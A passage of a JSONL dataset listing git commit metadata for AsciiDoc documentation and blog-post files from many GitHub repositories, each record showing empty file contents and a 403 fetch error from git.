<864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\n","repos":"InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu","old_file":"docs\/known_issues.adoc","new_file":"docs\/known_issues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d12e5945b1b9420fca79fdef8077c533240e9829","subject":"Update 2008-01-01-Draft-Convincing-Maven-To-Work-On-Fedora-21.adoc","message":"Update 2008-01-01-Draft-Convincing-Maven-To-Work-On-Fedora-21.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2008-01-01-Draft-Convincing-Maven-To-Work-On-Fedora-21.adoc","new_file":"_posts\/2008-01-01-Draft-Convincing-Maven-To-Work-On-Fedora-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"813d647da132479cde23830e3728ad12f8a7f0a7","subject":"Update 2016-07-16-Chat.adoc","message":"Update 
2016-07-16-Chat.adoc","repos":"txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io","old_file":"_posts\/2016-07-16-Chat.adoc","new_file":"_posts\/2016-07-16-Chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/txemis\/txemis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e26edf72ac7c2f33268f1c14ff56d3d7037a788","subject":"Update 2015-09-17-Pull.adoc","message":"Update 2015-09-17-Pull.adoc","repos":"NadineLaCuisine\/NadineLaCuisine.github.io,NadineLaCuisine\/NadineLaCuisine.github.io,NadineLaCuisine\/NadineLaCuisine.github.io","old_file":"_posts\/2015-09-17-Pull.adoc","new_file":"_posts\/2015-09-17-Pull.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NadineLaCuisine\/NadineLaCuisine.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95055168ecfecb6ed512dad0307621edae057ff0","subject":"up post","message":"up post\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_posts\/2017-09-01-fud5.adoc","new_file":"_posts\/2017-09-01-fud5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d4e3f21d67a6ab61288c85606bcd81a96eca3d1","subject":"Update 2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc","message":"Update 2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc","repos":"ambarishpande\/blog,ambarishpande\/blog,ambarishpande\/blog,ambarishpande\/blog","old_file":"_posts\/2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc","new_file":"_posts\/2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ambarishpande\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2889ec31c38902270d84f7960f044dee7db7cc0","subject":"Update 1993-8-11-commoncommonfunctionphp.adoc","message":"Update 1993-8-11-commoncommonfunctionphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-8-11-commoncommonfunctionphp.adoc","new_file":"_posts\/1993-8-11-commoncommonfunctionphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dc9b41e4f840b1de02edb7aedd819e805c0452e","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9e1e6932c31d36aeec9dd4b385df65d7a43ec59","subject":"Update 2019-02-04-Google-Spread-Sheet.adoc","message":"Update 2019-02-04-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed119b5707e3de3295194b6568d1ea02fd396075","subject":"Works on doc","message":"Works on doc\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/api\/ubf\/Bfldid.adoc","new_file":"doc\/api\/ubf\/Bfldid.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"ffefc21eabd1351366de722d3d930df4e09a052b","subject":"Added release instructions","message":"Added release instructions\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"RELEASE.adoc","new_file":"RELEASE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"27096f16aa05b38898fa78951993b1fed91f0423","subject":"Update 2015-07-14-Turn-your-Raspberry-Pi-2-into-a-Hotspot.adoc","message":"Update 2015-07-14-Turn-your-Raspberry-Pi-2-into-a-Hotspot.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-07-14-Turn-your-Raspberry-Pi-2-into-a-Hotspot.adoc","new_file":"_posts\/2015-07-14-Turn-your-Raspberry-Pi-2-into-a-Hotspot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"114da9a29c93ae4616ac3d9be89617a00ee0235c","subject":"Update 2015-06-30-Desarrollo-de-una-aplicacion-desde-cero-El-patron-MVC-y-la-capa-de-presentacion.adoc","message":"Update 2015-06-30-Desarrollo-de-una-aplicacion-desde-cero-El-patron-MVC-y-la-capa-de-presentacion.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-06-30-Desarrollo-de-una-aplicacion-desde-cero-El-patron-MVC-y-la-capa-de-presentacion.adoc","new_file":"_posts\/2015-06-30-Desarrollo-de-una-aplicacion-desde-cero-El-patron-MVC-y-la-capa-de-presentacion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b227cb38f135c633c7ba1b51eb9cbae00866fae","subject":"y2b create post Call of Duty Black Ops 2 Hardened Edition Unboxing","message":"y2b create post Call of Duty Black Ops 2 Hardened Edition 
Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-11-13-Call-of-Duty-Black-Ops-2-Hardened-Edition-Unboxing.adoc","new_file":"_posts\/2012-11-13-Call-of-Duty-Black-Ops-2-Hardened-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c9fbba2831d6b9bf88c505c585d65d01e073601","subject":"Update 2015-11-12-us-hongkong-nutrition-supplements-price-comparison.adoc","message":"Update 2015-11-12-us-hongkong-nutrition-supplements-price-comparison.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-12-us-hongkong-nutrition-supplements-price-comparison.adoc","new_file":"_posts\/2015-11-12-us-hongkong-nutrition-supplements-price-comparison.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e66c7f20f61b34a1bd5278c7352c5bd875ae9d3","subject":"Update 2018-07-25-Covariance-Contravariance-in-Scala-Connecting-Dots.adoc","message":"Update 2018-07-25-Covariance-Contravariance-in-Scala-Connecting-Dots.adoc","repos":"codingkapoor\/codingkapoor.github.io,codingkapoor\/codingkapoor.github.io,codingkapoor\/codingkapoor.github.io,codingkapoor\/codingkapoor.github.io","old_file":"_posts\/2018-07-25-Covariance-Contravariance-in-Scala-Connecting-Dots.adoc","new_file":"_posts\/2018-07-25-Covariance-Contravariance-in-Scala-Connecting-Dots.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codingkapoor\/codingkapoor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84f9b11caac20d8de2ee4f3d8c73a07cd63348a7","subject":"Update 2016-02-25-Luigis-Rollickin-Roadsters-to-open-on-March-7.adoc","message":"Update 2016-02-25-Luigis-Rollickin-Roadsters-to-open-on-March-7.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-25-Luigis-Rollickin-Roadsters-to-open-on-March-7.adoc","new_file":"_posts\/2016-02-25-Luigis-Rollickin-Roadsters-to-open-on-March-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c3d0550c3a85f64d3d9b697dd7e54bb3af52932","subject":"Update 2017-07-31-to-reflect-on-the-cache.adoc","message":"Update 2017-07-31-to-reflect-on-the-cache.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-31-to-reflect-on-the-cache.adoc","new_file":"_posts\/2017-07-31-to-reflect-on-the-cache.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"8d062ecbe5cbb5928891fe800a6047d3ba862a6a","subject":"Update 2016-02-16-Swift-Google-Analytics-using-Cocoa-Pods.adoc","message":"Update 2016-02-16-Swift-Google-Analytics-using-Cocoa-Pods.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-02-16-Swift-Google-Analytics-using-Cocoa-Pods.adoc","new_file":"_posts\/2016-02-16-Swift-Google-Analytics-using-Cocoa-Pods.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2be1af92091041f0f343fe52febaa1a4e2236ed","subject":"Started security documentation","message":"Started security documentation\n","repos":"lefou\/blended,woq-blended\/blended,lefou\/blended,woq-blended\/blended","old_file":"doc\/Security.adoc","new_file":"doc\/Security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lefou\/blended.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"29dc109069db677e90404df2f9f4024ebf0628b4","subject":"Updates book-using-jison-beyond-the-basics\/4_The_Real_Meat_Advanced_Topics.adoc","message":"Updates book-using-jison-beyond-the-basics\/4_The_Real_Meat_Advanced_Topics.adoc\n\nAuto commit by GitBook Editor","repos":"GerHobbelt\/jison,GerHobbelt\/jison,GerHobbelt\/jison,GerHobbelt\/jison","old_file":"book-using-jison-beyond-the-basics\/4_The_Real_Meat_Advanced_Topics.adoc","new_file":"book-using-jison-beyond-the-basics\/4_The_Real_Meat_Advanced_Topics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GerHobbelt\/jison.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86110620bb79d6394e7b0ee82bc04b6b83f2f76b","subject":"Update CentOS 6: Install SBT.asciidoc","message":"Update CentOS 6: Install SBT.asciidoc","repos":"lancegatlin\/techblog,lancegatlin\/techblog","old_file":"posts\/CentOS 6: Install SBT.asciidoc","new_file":"posts\/CentOS 6: Install SBT.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lancegatlin\/techblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb7699f16344b6aa2da99af164e15335b659b757","subject":"GithubOrg or GithubUsername can be used for the .\/start.sh script (#32)","message":"GithubOrg or GithubUsername can be used for the .\/start.sh script (#32)\n\n* Update JENKINS.adoc\r\n\r\n* Update JENKINS.adoc\r\n","repos":"wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines","old_file":"docs\/JENKINS.adoc","new_file":"docs\/JENKINS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"09538f8508468f7b7b96dfa20df859ba2bf15d55","subject":"job #12502 added implementation 
note","message":"job #12502 added implementation note\n","repos":"cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint","old_file":"doc-bridgepoint\/notes\/12502_clean_x2m.int.adoc","new_file":"doc-bridgepoint\/notes\/12502_clean_x2m.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortlandstarrett\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e08daecc32c1e43af5c473922473ada59c29a8b7","subject":"Update 2015-05-06-Nuovo-Post.adoc","message":"Update 2015-05-06-Nuovo-Post.adoc","repos":"bartoleo\/bartoleo.github.io,bartoleo\/bartoleo.github.io,bartoleo\/bartoleo.github.io","old_file":"_posts\/2015-05-06-Nuovo-Post.adoc","new_file":"_posts\/2015-05-06-Nuovo-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bartoleo\/bartoleo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b15a7ed08322edf760f63b625e3cc7b838a2f1db","subject":"Update 2016-03-04-New-System.adoc","message":"Update 2016-03-04-New-System.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-03-04-New-System.adoc","new_file":"_posts\/2016-03-04-New-System.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac8749b6110df96af67a833b93671225aafac96d","subject":"Update 2016-03-04-New-System.adoc","message":"Update 2016-03-04-New-System.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-03-04-New-System.adoc","new_file":"_posts\/2016-03-04-New-System.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cc4e0f83cedc45baab98ec05f930793474d843f","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update 
Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67409e3a5dd7c2bf14ed574f545d38389b207734","subject":"'nother placeholder.","message":"'nother placeholder.\n","repos":"LearningTree\/TicketManorJava,LearningTree\/TicketManorJava,LearningTree\/TicketManorJava,LearningTree\/TicketManorJava","old_file":"spring-client\/README.adoc","new_file":"spring-client\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTree\/TicketManorJava.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f92d1899b86ab87d3fb73f7b8d0cb3d1b09ccc3","subject":"Create SECURITY.adoc","message":"Create SECURITY.adoc\n\nCloses gh-441.","repos":"mp911de\/spring-vault,mp911de\/spring-vault","old_file":"SECURITY.adoc","new_file":"SECURITY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mp911de\/spring-vault.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0373a0c12adb3ed2a9da26838938c98ea3fd98f2","subject":"Update 2016-12-06-problem-solving-algorithm-intermediate02.adoc","message":"Update 2016-12-06-problem-solving-algorithm-intermediate02.adoc","repos":"qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io","old_file":"_posts\/2016-12-06-problem-solving-algorithm-intermediate02.adoc","new_file":"_posts\/2016-12-06-problem-solving-algorithm-intermediate02.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qeist\/qeist.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7040341c59d5552eda201a88044d54e4a670ca22","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a62744f38e13e811446923bbc2fd18c468a15f45","subject":"Update 2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","message":"Update 2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","new_file":"_posts\/2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': 
The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8ed708e4ab5aec66129e0be7ed243c5bfb6599e","subject":"job #11554 added framework of design note","message":"job #11554 added framework of design note\n","repos":"leviathan747\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,perojonsson\/bridgepoint,perojonsson\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,perojonsson\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,perojonsson\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,perojonsson\/bridgepoint,rmulvey\/bridgepoint,perojonsson\/bridgepoint,lwriemen\/bridgepoint,perojonsson\/bridgepoint,xtuml\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11554_relationship_editor\/11554_relationship_editor_dnt.adoc","new_file":"doc-bridgepoint\/notes\/11554_relationship_editor\/11554_relationship_editor_dnt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmulvey\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"abbf73f40841385b38bb5f5f3937a0238872c3fc","subject":"Update 2015-04-19-QRGen-mit-Android-Support-und-SVG-Support.adoc","message":"Update 2015-04-19-QRGen-mit-Android-Support-und-SVG-Support.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2015-04-19-QRGen-mit-Android-Support-und-SVG-Support.adoc","new_file":"_posts\/2015-04-19-QRGen-mit-Android-Support-und-SVG-Support.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48b368503a1ac97b9eae290eae742b67397cce09","subject":"Update 2015-07-28-Mi-Primer-articulo.adoc","message":"Update 2015-07-28-Mi-Primer-articulo.adoc","repos":"TommyHernandez\/tommyhernandez.github.io,TommyHernandez\/tommyhernandez.github.io,TommyHernandez\/tommyhernandez.github.io","old_file":"_posts\/2015-07-28-Mi-Primer-articulo.adoc","new_file":"_posts\/2015-07-28-Mi-Primer-articulo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TommyHernandez\/tommyhernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"41481b6b351484957f39cb5f401f40300cbed4a5","subject":"filter docs further improved, but still not complete","message":"filter docs further improved, but still not complete\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c5e335a5ec9114c5f6c97cbfb2e2911bdb0cf2e0","subject":"Update 2017-06-01-Naming-Conventions.adoc","message":"Update 2017-06-01-Naming-Conventions.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-06-01-Naming-Conventions.adoc","new_file":"_posts\/2017-06-01-Naming-Conventions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cff4665857c66c3415adc444763558849b5014e9","subject":"Adding a link to the example how to add +attributes in adoc.","message":"Adding a link to the example how to add +attributes in adoc.\n","repos":"objectiser\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,ppalaga\/hawkular.github.io,ppalaga\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lzoubek\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e9a3011a40b77c4360082194dada3162f3250d6d","subject":"Added README.adoc","message":"Added README.adoc\n","repos":"asciidoctor\/asciidoctorj-groovy-dsl","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 